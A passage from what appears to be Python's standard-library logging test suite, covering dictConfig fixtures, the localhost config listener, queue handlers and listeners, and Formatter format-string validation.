"class": "logging.StreamHandler",
"level": "DEBUG",
"formatter": "mySimpleFormatter"
},
"bufferGlobal": {
"class": "logging.handlers.MemoryHandler",
"capacity": 5,
"formatter": "mySimpleFormatter",
"target": "fileGlobal",
"level": "DEBUG"
}
},
"loggers": {
"mymodule": {
"level": "DEBUG",
"handlers": ["bufferGlobal"],
"propagate": "true"
}
}
}
# Configuration with custom logging.Formatter subclass as '()' key and 'validate' set to False
custom_formatter_class_validate = {
'version': 1,
'formatters': {
'form1': {
'()': __name__ + '.ExceptionFormatter',
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
# Configuration with custom logging.Formatter subclass as 'class' key and 'validate' set to False
custom_formatter_class_validate2 = {
'version': 1,
'formatters': {
'form1': {
'class': __name__ + '.ExceptionFormatter',
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
# Configuration with custom class that is not inherited from logging.Formatter
custom_formatter_class_validate3 = {
'version': 1,
'formatters': {
'form1': {
'class': __name__ + '.myCustomFormatter',
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
# Configuration with custom function and 'validate' set to False
custom_formatter_with_function = {
'version': 1,
'formatters': {
'form1': {
'()': formatFunc,
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
def apply_config(self, conf):
logging.config.dictConfig(conf)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config2a_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2a)
def test_config2b_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2b)
def test_config3_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4a)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_failure(self):
self.assertRaises(Exception, self.apply_config, self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
# Same as test_config_7_ok but don't disable old loggers.
def test_config_8_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_8a_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8a)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_9_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config9)
logger = logging.getLogger("compiler.parser")
# Nothing will be output since both handler and logger are set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
# Nothing will be output since handler is still set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
# Message should now be output
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config10)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
# Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(Exception, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(Exception, self.apply_config, self.config13)
def test_config14_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config14)
h = logging._handlers['hand1']
self.assertEqual(h.foo, 'bar')
self.assertEqual(h.terminator, '!\n')
logging.warning('Exclamation')
self.assertTrue(output.getvalue().endswith('Exclamation!\n'))
def test_config15_ok(self):
def cleanup(h1, fn):
h1.close()
os.remove(fn)
with self.check_no_resource_warning():
fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
os.close(fd)
config = {
"version": 1,
"handlers": {
"file": {
"class": "logging.FileHandler",
"filename": fn
}
},
"root": {
"handlers": ["file"]
}
}
self.apply_config(config)
self.apply_config(config)
handler = logging.root.handlers[0]
self.addCleanup(cleanup, handler, fn)
def setup_via_listener(self, text, verify=None):
text = text.encode("utf-8")
# Ask for a randomly assigned port (by using port 0)
t = logging.config.listen(0, verify)
t.start()
t.ready.wait()
# Now get the port allocated
port = t.port
t.ready.clear()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
slen = struct.pack('>L', len(text))
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
support.join_thread(t, 2.0)
def test_listen_config_10_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
# Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_listen_config_1_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_listen_verify(self):
def verify_fail(stuff):
return None
def verify_reverse(stuff):
return stuff[::-1]
logger = logging.getLogger("compiler.parser")
to_send = textwrap.dedent(ConfigFileTest.config1)
# First, specify a verification function that will fail.
# We expect to see no output, since our configuration
# never took effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send, verify_fail)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([], stream=output)
# Original logger output has the stuff we logged.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform no verification. Our configuration
# should take effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send) # no verify callable specified
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform verification which transforms the bytes.
with support.captured_stdout() as output:
self.setup_via_listener(to_send[::-1], verify_reverse)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
def test_out_of_order(self):
self.assertRaises(ValueError, self.apply_config, self.out_of_order)
def test_out_of_order_with_dollar_style(self):
config = copy.deepcopy(self.out_of_order)
config['formatters']['mySimpleFormatter']['format'] = "${asctime} (${name}) ${levelname}: ${message}"
self.apply_config(config)
handler = logging.getLogger('mymodule').handlers[0]
self.assertIsInstance(handler.target, logging.Handler)
self.assertIsInstance(handler.formatter._style,
logging.StringTemplateStyle)
def test_custom_formatter_class_with_validate(self):
self.apply_config(self.custom_formatter_class_validate)
handler = logging.getLogger("my_test_logger_custom_formatter").handlers[0]
self.assertIsInstance(handler.formatter, ExceptionFormatter)
def test_custom_formatter_class_with_validate2(self):
self.apply_config(self.custom_formatter_class_validate2)
handler = logging.getLogger("my_test_logger_custom_formatter").handlers[0]
self.assertIsInstance(handler.formatter, ExceptionFormatter)
def test_custom_formatter_class_with_validate2_with_wrong_fmt(self):
config = self.custom_formatter_class_validate.copy()
config['formatters']['form1']['style'] = "$"
# Exception should not be raise as we have configured 'validate' to False
self.apply_config(config)
handler = logging.getLogger("my_test_logger_custom_formatter").handlers[0]
self.assertIsInstance(handler.formatter, ExceptionFormatter)
def test_custom_formatter_class_with_validate3(self):
self.assertRaises(ValueError, self.apply_config, self.custom_formatter_class_validate3)
def test_custom_formatter_function_with_validate(self):
self.assertRaises(ValueError, self.apply_config, self.custom_formatter_with_function)
def test_baseconfig(self):
d = {
'atuple': (1, 2, 3),
'alist': ['a', 'b', 'c'],
'adict': {'d': 'e', 'f': 3 },
'nest1': ('g', ('h', 'i'), 'j'),
'nest2': ['k', ['l', 'm'], 'n'],
'nest3': ['o', 'cfg://alist', 'p'],
}
bc = logging.config.BaseConfigurator(d)
self.assertEqual(bc.convert('cfg://atuple[1]'), 2)
self.assertEqual(bc.convert('cfg://alist[1]'), 'b')
self.assertEqual(bc.convert('cfg://nest1[1][0]'), 'h')
self.assertEqual(bc.convert('cfg://nest2[1][1]'), 'm')
self.assertEqual(bc.convert('cfg://adict.d'), 'e')
self.assertEqual(bc.convert('cfg://adict[f]'), 3)
v = bc.convert('cfg://nest3')
self.assertEqual(v.pop(1), ['a', 'b', 'c'])
self.assertRaises(KeyError, bc.convert, 'cfg://nosuch')
self.assertRaises(ValueError, bc.convert, 'cfg://!')
self.assertRaises(KeyError, bc.convert, 'cfg://adict[2]')
def test_namedtuple(self):
# see bpo-39142
from collections import namedtuple
class MyHandler(logging.StreamHandler):
def __init__(self, resource, *args, **kwargs):
super().__init__(*args, **kwargs)
self.resource: namedtuple = resource
def emit(self, record):
record.msg += f' {self.resource.type}'
return super().emit(record)
Resource = namedtuple('Resource', ['type', 'labels'])
resource = Resource(type='my_type', labels=['a'])
config = {
'version': 1,
'handlers': {
'myhandler': {
'()': MyHandler,
'resource': resource
}
},
'root': {'level': 'INFO', 'handlers': ['myhandler']},
}
with support.captured_stderr() as stderr:
self.apply_config(config)
logging.info('some log')
self.assertEqual(stderr.getvalue(), 'some log my_type\n')
class ManagerTest(BaseTest):
def test_manager_loggerclass(self):
logged = []
class MyLogger(logging.Logger):
def _log(self, level, msg, args, exc_info=None, extra=None):
logged.append(msg)
man = logging.Manager(None)
self.assertRaises(TypeError, man.setLoggerClass, int)
man.setLoggerClass(MyLogger)
logger = man.getLogger('test')
logger.warning('should appear in logged')
logging.warning('should not appear in logged')
self.assertEqual(logged, ['should appear in logged'])
def test_set_log_record_factory(self):
man = logging.Manager(None)
expected = object()
man.setLogRecordFactory(expected)
self.assertEqual(man.logRecordFactory, expected)
class ChildLoggerTest(BaseTest):
def test_child_loggers(self):
r = logging.getLogger()
l1 = logging.getLogger('abc')
l2 = logging.getLogger('def.ghi')
c1 = r.getChild('xyz')
c2 = r.getChild('uvw.xyz')
self.assertIs(c1, logging.getLogger('xyz'))
self.assertIs(c2, logging.getLogger('uvw.xyz'))
c1 = l1.getChild('def')
c2 = c1.getChild('ghi')
c3 = l1.getChild('def.ghi')
self.assertIs(c1, logging.getLogger('abc.def'))
self.assertIs(c2, logging.getLogger('abc.def.ghi'))
self.assertIs(c2, c3)
class DerivedLogRecord(logging.LogRecord):
pass
class LogRecordFactoryTest(BaseTest):
def setUp(self):
class CheckingFilter(logging.Filter):
def __init__(self, cls):
self.cls = cls
def filter(self, record):
t = type(record)
if t is not self.cls:
msg = 'Unexpected LogRecord type %s, expected %s' % (t,
self.cls)
raise TypeError(msg)
return True
BaseTest.setUp(self)
self.filter = CheckingFilter(DerivedLogRecord)
self.root_logger.addFilter(self.filter)
self.orig_factory = logging.getLogRecordFactory()
def tearDown(self):
self.root_logger.removeFilter(self.filter)
BaseTest.tearDown(self)
logging.setLogRecordFactory(self.orig_factory)
def test_logrecord_class(self):
self.assertRaises(TypeError, self.root_logger.warning,
self.next_message())
logging.setLogRecordFactory(DerivedLogRecord)
self.root_logger.error(self.next_message())
self.assert_log_lines([
('root', 'ERROR', '2'),
])
class QueueHandlerTest(BaseTest):
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.queue = queue.Queue(-1)
self.que_hdlr = logging.handlers.QueueHandler(self.queue)
self.name = 'que'
self.que_logger = logging.getLogger('que')
self.que_logger.propagate = False
self.que_logger.setLevel(logging.WARNING)
self.que_logger.addHandler(self.que_hdlr)
def tearDown(self):
self.que_hdlr.close()
BaseTest.tearDown(self)
def test_queue_handler(self):
self.que_logger.debug(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
self.que_logger.info(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
msg = self.next_message()
self.que_logger.warning(msg)
data = self.queue.get_nowait()
self.assertTrue(isinstance(data, logging.LogRecord))
self.assertEqual(data.name, self.que_logger.name)
self.assertEqual((data.msg, data.args), (msg, None))
def test_formatting(self):
msg = self.next_message()
levelname = logging.getLevelName(logging.WARNING)
log_format_str = '{name} -> {levelname}: {message}'
formatted_msg = log_format_str.format(name=self.name,
levelname=levelname, message=msg)
formatter = logging.Formatter(self.log_format)
self.que_hdlr.setFormatter(formatter)
self.que_logger.warning(msg)
log_record = self.queue.get_nowait()
self.assertEqual(formatted_msg, log_record.msg)
self.assertEqual(formatted_msg, log_record.message)
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener(self):
handler = support.TestHandler(support.Matcher())
listener = logging.handlers.QueueListener(self.queue, handler)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertTrue(handler.matches(levelno=logging.WARNING, message='1'))
self.assertTrue(handler.matches(levelno=logging.ERROR, message='2'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='3'))
handler.close()
# Now test with respect_handler_level set
handler = support.TestHandler(support.Matcher())
handler.setLevel(logging.CRITICAL)
listener = logging.handlers.QueueListener(self.queue, handler,
respect_handler_level=True)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertFalse(handler.matches(levelno=logging.WARNING, message='4'))
self.assertFalse(handler.matches(levelno=logging.ERROR, message='5'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='6'))
handler.close()
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener_with_StreamHandler(self):
# Test that traceback only appends once (bpo-34334).
listener = logging.handlers.QueueListener(self.queue, self.root_hdlr)
listener.start()
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.que_logger.exception(self.next_message(), exc_info=exc)
listener.stop()
self.assertEqual(self.stream.getvalue().strip().count('Traceback'), 1)
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener_with_multiple_handlers(self):
# Test that queue handler format doesn't affect other handler formats (bpo-35726).
self.que_hdlr.setFormatter(self.root_formatter)
self.que_logger.addHandler(self.root_hdlr)
listener = logging.handlers.QueueListener(self.queue, self.que_hdlr)
listener.start()
self.que_logger.error("error")
listener.stop()
self.assertEqual(self.stream.getvalue().strip(), "que -> ERROR: error")
if hasattr(logging.handlers, 'QueueListener'):
import multiprocessing
from unittest.mock import patch
class QueueListenerTest(BaseTest):
"""
Tests based on patch submitted for issue #27930. Ensure that
QueueListener handles all log messages.
"""
repeat = 20
@staticmethod
def setup_and_log(log_queue, ident):
"""
Creates a logger with a QueueHandler that logs to a queue read by a
QueueListener. Starts the listener, logs five messages, and stops
the listener.
"""
logger = logging.getLogger('test_logger_with_id_%s' % ident)
logger.setLevel(logging.DEBUG)
handler = logging.handlers.QueueHandler(log_queue)
logger.addHandler(handler)
listener = logging.handlers.QueueListener(log_queue)
listener.start()
logger.info('one')
logger.info('two')
logger.info('three')
logger.info('four')
logger.info('five')
listener.stop()
logger.removeHandler(handler)
handler.close()
@patch.object(logging.handlers.QueueListener, 'handle')
def test_handle_called_with_queue_queue(self, mock_handle):
for i in range(self.repeat):
log_queue = queue.Queue()
self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
self.assertEqual(mock_handle.call_count, 5 * self.repeat,
'correct number of handled log messages')
@patch.object(logging.handlers.QueueListener, 'handle')
def test_handle_called_with_mp_queue(self, mock_handle):
# bpo-28668: The multiprocessing (mp) module is not functional
# when the mp.synchronize module cannot be imported.
support.skip_if_broken_multiprocessing_synchronize()
for i in range(self.repeat):
log_queue = multiprocessing.Queue()
self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
log_queue.close()
log_queue.join_thread()
self.assertEqual(mock_handle.call_count, 5 * self.repeat,
'correct number of handled log messages')
@staticmethod
def get_all_from_queue(log_queue):
try:
while True:
yield log_queue.get_nowait()
except queue.Empty:
return []
def test_no_messages_in_queue_after_stop(self):
"""
Five messages are logged then the QueueListener is stopped. This
test then gets everything off the queue. Failure of this test
indicates that messages were not registered on the queue until
_after_ the QueueListener stopped.
"""
# bpo-28668: The multiprocessing (mp) module is not functional
# when the mp.synchronize module cannot be imported.
support.skip_if_broken_multiprocessing_synchronize()
for i in range(self.repeat):
queue = multiprocessing.Queue()
self.setup_and_log(queue, '%s_%s' %(self.id(), i))
# time.sleep(1)
items = list(self.get_all_from_queue(queue))
queue.close()
queue.join_thread()
expected = [[], [logging.handlers.QueueListener._sentinel]]
self.assertIn(items, expected,
'Found unexpected messages in queue: %s' % (
[m.msg if isinstance(m, logging.LogRecord)
else m for m in items]))
def test_calls_task_done_after_stop(self):
# Issue 36813: Make sure queue.join does not deadlock.
log_queue = queue.Queue()
listener = logging.handlers.QueueListener(log_queue)
listener.start()
listener.stop()
with self.assertRaises(ValueError):
# Make sure all tasks are done and .join won't block.
log_queue.task_done()
ZERO = datetime.timedelta(0)
class UTC(datetime.tzinfo):
def utcoffset(self, dt):
return ZERO
dst = utcoffset
def tzname(self, dt):
return 'UTC'
utc = UTC()
class FormatterTest(unittest.TestCase):
def setUp(self):
self.common = {
'name': 'formatter.test',
'level': logging.DEBUG,
'pathname': os.path.join('path', 'to', 'dummy.ext'),
'lineno': 42,
'exc_info': None,
'func': None,
'msg': 'Message with %d %s',
'args': (2, 'placeholders'),
}
self.variants = {
}
def get_record(self, name=None):
result = dict(self.common)
if name is not None:
result.update(self.variants[name])
return logging.makeLogRecord(result)
def assert_error_message(self, exception, message, *args, **kwargs):
try:
self.assertRaises(exception, *args, **kwargs)
except exception as e:
self.assertEqual(message, e.message)
def test_percent(self):
# Test %-formatting
r = self.get_record()
f = logging.Formatter('${%(message)s}')
self.assertEqual(f.format(r), '${Message with 2 placeholders}')
f = logging.Formatter('%(random)s')
self.assertRaises(ValueError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('%(asctime)s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)-15s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)#15s')
self.assertTrue(f.usesTime())
def test_braces(self):
# Test {}-formatting
r = self.get_record()
f = logging.Formatter('$%{message}%$', style='{')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('{random}', style='{')
self.assertRaises(ValueError, f.format, r)
f = logging.Formatter("{message}", style='{')
self.assertFalse(f.usesTime())
f = logging.Formatter('{asctime}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime!s:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime:15}', style='{')
self.assertTrue(f.usesTime())
def test_dollars(self):
# Test $-formatting
r = self.get_record()
f = logging.Formatter('${message}', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$message', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$$%${message}%$$', style='$')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('${random}', style='$')
self.assertRaises(ValueError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('$asctime', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('${message}', style='$')
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}--', style='$')
self.assertTrue(f.usesTime())
def test_format_validate(self):
# Check correct formatting
# Percentage style
f = logging.Formatter("%(levelname)-15s - %(message) 5s - %(process)03d - %(module) - %(asctime)*.3s")
self.assertEqual(f._fmt, "%(levelname)-15s - %(message) 5s - %(process)03d - %(module) - %(asctime)*.3s")
f = logging.Formatter("%(asctime)*s - %(asctime)*.3s - %(process)-34.33o")
self.assertEqual(f._fmt, "%(asctime)*s - %(asctime)*.3s - %(process)-34.33o")
f = logging.Formatter("%(process)#+027.23X")
self.assertEqual(f._fmt, "%(process)#+027.23X")
f = logging.Formatter("%(foo)#.*g")
self.assertEqual(f._fmt, "%(foo)#.*g")
# StrFormat Style
f = logging.Formatter("$%{message}%$ - {asctime!a:15} - {customfield['key']}", style="{")
self.assertEqual(f._fmt, "$%{message}%$ - {asctime!a:15} - {customfield['key']}")
f = logging.Formatter("{process:.2f} - {custom.f:.4f}", style="{")
self.assertEqual(f._fmt, "{process:.2f} - {custom.f:.4f}")
f = logging.Formatter("{customfield!s:#<30}", style="{")
self.assertEqual(f._fmt, "{customfield!s:#<30}")
f = logging.Formatter("{message!r}", style="{")
self.assertEqual(f._fmt, "{message!r}")
f = logging.Formatter("{message!s}", style="{")
self.assertEqual(f._fmt, "{message!s}")
f = logging.Formatter("{message!a}", style="{")
self.assertEqual(f._fmt, "{message!a}")
f = logging.Formatter("{process!r:4.2}", style="{")
self.assertEqual(f._fmt, "{process!r:4.2}")
f = logging.Formatter("{process!s:<#30,.12f}- {custom:=+#30,.1d} - {module:^30}", style="{")
self.assertEqual(f._fmt, "{process!s:<#30,.12f}- {custom:=+#30,.1d} - {module:^30}")
f = logging.Formatter("{process!s:{w},.{p}}", style="{")
self.assertEqual(f._fmt, "{process!s:{w},.{p}}")
f = logging.Formatter("{foo:12.{p}}", style="{")
self.assertEqual(f._fmt, "{foo:12.{p}}")
f = logging.Formatter("{foo:{w}.6}", style="{")
self.assertEqual(f._fmt, "{foo:{w}.6}")
f = logging.Formatter("{foo[0].bar[1].baz}", style="{")
self.assertEqual(f._fmt, "{foo[0].bar[1].baz}")
f = logging.Formatter("{foo[k1].bar[k2].baz}", style="{")
self.assertEqual(f._fmt, "{foo[k1].bar[k2].baz}")
f = logging.Formatter("{12[k1].bar[k2].baz}", style="{")
self.assertEqual(f._fmt, "{12[k1].bar[k2].baz}")
# Dollar style
f = logging.Formatter("${asctime} - $message", style="$")
self.assertEqual(f._fmt, "${asctime} - $message")
f = logging.Formatter("$bar $$", style="$")
self.assertEqual(f._fmt, "$bar $$")
f = logging.Formatter("$bar $$$$", style="$")
self.assertEqual(f._fmt, "$bar $$$$") # this would print two $($$)
# Testing when ValueError being raised from incorrect format
# Percentage Style
self.assertRaises(ValueError, logging.Formatter, "%(asctime)Z")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)b")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)*")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)*3s")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)_")
self.assertRaises(ValueError, logging.Formatter, '{asctime}')
self.assertRaises(ValueError, logging.Formatter, '${message}')
self.assertRaises(ValueError, logging.Formatter, '%(foo)#12.3*f') # with both * and decimal number as precision
self.assertRaises(ValueError, logging.Formatter, '%(foo)0*.8*f')
# StrFormat Style
# Testing failure for '-' in field name
self.assert_error_message(
ValueError,
"invalid field name/expression: 'name-thing'",
logging.Formatter, "{name-thing}", style="{"
)
# Testing failure for style mismatch
self.assert_error_message(
ValueError,
"invalid format: no fields",
logging.Formatter, '%(asctime)s', style='{'
)
# Testing failure for invalid conversion
self.assert_error_message(
ValueError,
"invalid conversion: 'Z'"
)
self.assertRaises(ValueError, logging.Formatter, '{asctime!s:#30,15f}', style='{')
self.assert_error_message(
ValueError,
"invalid format: expected ':' after conversion specifier",
logging.Formatter, '{asctime!aa:15}', style='{'
)
# Testing failure for invalid spec
self.assert_error_message(
ValueError,
"bad specifier: '.2ff'",
logging.Formatter, '{process:.2ff}', style='{'
)
self.assertRaises(ValueError, logging.Formatter, '{process:.2Z}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{process!s:<##30,12g}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{process!s:<#30#,12g}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{process!s:{{w}},{{p}}}', style='{')
# Testing failure for mismatch braces
self.assert_error_message(
ValueError,
"invalid format: unmatched '{' in format spec",
logging.Formatter, '{process', style='{'
)
self.assert_error_message(
ValueError,
"invalid format: unmatched '{' in format spec",
logging.Formatter, 'process}', style='{'
)
self.assertRaises(ValueError, logging.Formatter, '{{foo!r:4.2}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{{foo!r:4.2}}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo/bar}', style='{')
